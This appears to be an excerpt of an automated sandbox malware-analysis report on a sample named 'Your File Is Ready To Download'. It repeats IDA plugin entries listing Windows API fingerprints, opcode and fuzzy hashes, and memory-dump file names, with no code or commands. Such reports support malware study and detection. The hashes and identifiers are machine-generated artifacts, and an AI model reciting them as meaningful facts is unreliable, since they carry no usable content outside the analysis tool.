                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountThreadTick$AttachInput$ClipboardCloseFocusGlobalMessagePeekProcessUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1514730375-0
                                                                                                                                                                                                                          • Opcode ID: cd15843e91281e5b9ee908c88a28e981e8a85fef4de83cc26e6aef36d53b437e
                                                                                                                                                                                                                          • Instruction ID: e9aece100f976da43861e7f221417fdd1ed22c36aca12058b6b43f9555e958d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd15843e91281e5b9ee908c88a28e981e8a85fef4de83cc26e6aef36d53b437e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A913931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3716859204-0
                                                                                                                                                                                                                          • Opcode ID: 9045afa7ff68d6d758fd7465decd8510b9363853d00760fc77734a0c668cf471
                                                                                                                                                                                                                          • Instruction ID: 90040355ca43226aa88c25f2e90826af395ffe36de7bedea7324ca478848b6b6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9045afa7ff68d6d758fd7465decd8510b9363853d00760fc77734a0c668cf471
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5947AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: e48d691b1342555744af5c1e82203bdc9ca2f5adec985c39c4e3245653571291
                                                                                                                                                                                                                          • Instruction ID: e242d355cfb9f1bf84a6fc2390798b912668a41450761d4aaf6386c57a157e2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e48d691b1342555744af5c1e82203bdc9ca2f5adec985c39c4e3245653571291
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 41cbceee6e497315b44e420d026ba5fe02903a4227a6bee7abe67a313910d660
                                                                                                                                                                                                                          • Instruction ID: e4cbfc9a37aff8be915b1068244a94b13da4b2b7e70e3dd545c8b7ae85bec3c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41cbceee6e497315b44e420d026ba5fe02903a4227a6bee7abe67a313910d660
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E914B71604B408AFB6B8B27E8443EA77A2F78DBD4F544116EB59876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2214806735-0
                                                                                                                                                                                                                          • Opcode ID: 03fda0708ac66dd2f581c8ee575d45d5af6eab0f5c841344617907c826e0f3f0
                                                                                                                                                                                                                          • Instruction ID: 3f504f6883fe98daf7a7a4ec8062de8263fd6359253ad18194368dcac8536ffe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03fda0708ac66dd2f581c8ee575d45d5af6eab0f5c841344617907c826e0f3f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01914A31604B408AFB6B8B27A8447EA77A2F78DBD4F544216FB59876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$Process$ClipboardCloseCurrentGlobalMessageOpenPeekTokenUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3060718303-0
                                                                                                                                                                                                                          • Opcode ID: 2bdd698e07211fd36147eb6777536f31da52d788477a4c58660fcafbe0037e1e
                                                                                                                                                                                                                          • Instruction ID: aa19f8e13fbaed35544cf7ebf871bea5fff6feb212f2dfb55b62a6c9fd360419
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bdd698e07211fd36147eb6777536f31da52d788477a4c58660fcafbe0037e1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B814C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekTextUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 189804293-0
                                                                                                                                                                                                                          • Opcode ID: a103bc6f932fd7d2426b29f5c2a861b4c49de0de3ef49d6074f775e11d55a71d
                                                                                                                                                                                                                          • Instruction ID: 63921aedb99911b84aa12d93bc99502e92ea3285baf7d73132177b5d4cb4d76d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a103bc6f932fd7d2426b29f5c2a861b4c49de0de3ef49d6074f775e11d55a71d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22913B71604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB59876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 49dd499240f719c284199b7ab0f31225a89f4abf5ee20a87ad63996d7ed51c41
                                                                                                                                                                                                                          • Instruction ID: 62b73bed3c5c3c43dd99c906a306d2e30aa9e6e4cfff39331c5acd201ac973f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49dd499240f719c284199b7ab0f31225a89f4abf5ee20a87ad63996d7ed51c41
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE914B31604B4086FB6B8B27A8443EA77A2F78DBE4F544216FB59876F5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: a972910a07b62aa6233c6906e4f4053767f0c6ab0a8133b48f442818b4f9800e
                                                                                                                                                                                                                          • Instruction ID: 559d60a5527382382b58865e5d2edc42a2d8c02177a3b85cae19912a811f2b81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a972910a07b62aa6233c6906e4f4053767f0c6ab0a8133b48f442818b4f9800e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2214806735-0
                                                                                                                                                                                                                          • Opcode ID: ec5568a2cc6fc2d538a7fef80bdd537fa074d23790feed04eec07492d2f7b6b4
                                                                                                                                                                                                                          • Instruction ID: ff80afe14330d23c64034345baa6099e7e823e29519c962c11066e9479e937a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec5568a2cc6fc2d538a7fef80bdd537fa074d23790feed04eec07492d2f7b6b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32912931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 90bee7c6787b58a3d53b315e3d349fc93a48a6b99ac64a542921c2ee4d0e1831
                                                                                                                                                                                                                          • Instruction ID: 0d812ad5943fac33cc80bcccacd539fd20e1f6e11964ca0e046d1199e6957aec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90bee7c6787b58a3d53b315e3d349fc93a48a6b99ac64a542921c2ee4d0e1831
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8914931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: cf251be6afe6b6713f41f6e4e8b26a38b1ca56cb428344335dfb0d38a7b03a57
                                                                                                                                                                                                                          • Instruction ID: 6d6323d427a85f2420e3fdf6b317896ab552785893d19bb27dfc8bef293756da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf251be6afe6b6713f41f6e4e8b26a38b1ca56cb428344335dfb0d38a7b03a57
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8913A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekRectUnlockWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1900757344-0
                                                                                                                                                                                                                          • Opcode ID: a4d770e6010a648fc5530070cede8acc97b6393d781b4e6f95f78b3a0856a0c9
                                                                                                                                                                                                                          • Instruction ID: cf235303c9cacdd03ff0586c050695ff5c3511e7825ade4502edb49383cc8fda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d770e6010a648fc5530070cede8acc97b6393d781b4e6f95f78b3a0856a0c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: fcd719b2242053e322410d2269258bcce9034da843dcdaa2f1bc5b8f0a506f69
                                                                                                                                                                                                                          • Instruction ID: e4cebf3604340715501835ea2dbb0eaf3dca9113579c6cebb53fab22eb961859
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd719b2242053e322410d2269258bcce9034da843dcdaa2f1bc5b8f0a506f69
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86814A31604B4086FB6B8B27A8443EA77A2F79DBD4F544216EB59876F5DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 371205aeaf19aa416dc033dc9c35e239c4cda74100fcdd1de13693342cdf6996
                                                                                                                                                                                                                          • Instruction ID: ba25751bd67c66cdcc981525960be61b93530ffbce360606cd1c00912f0af11e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 371205aeaf19aa416dc033dc9c35e239c4cda74100fcdd1de13693342cdf6996
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544116EB59876F5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
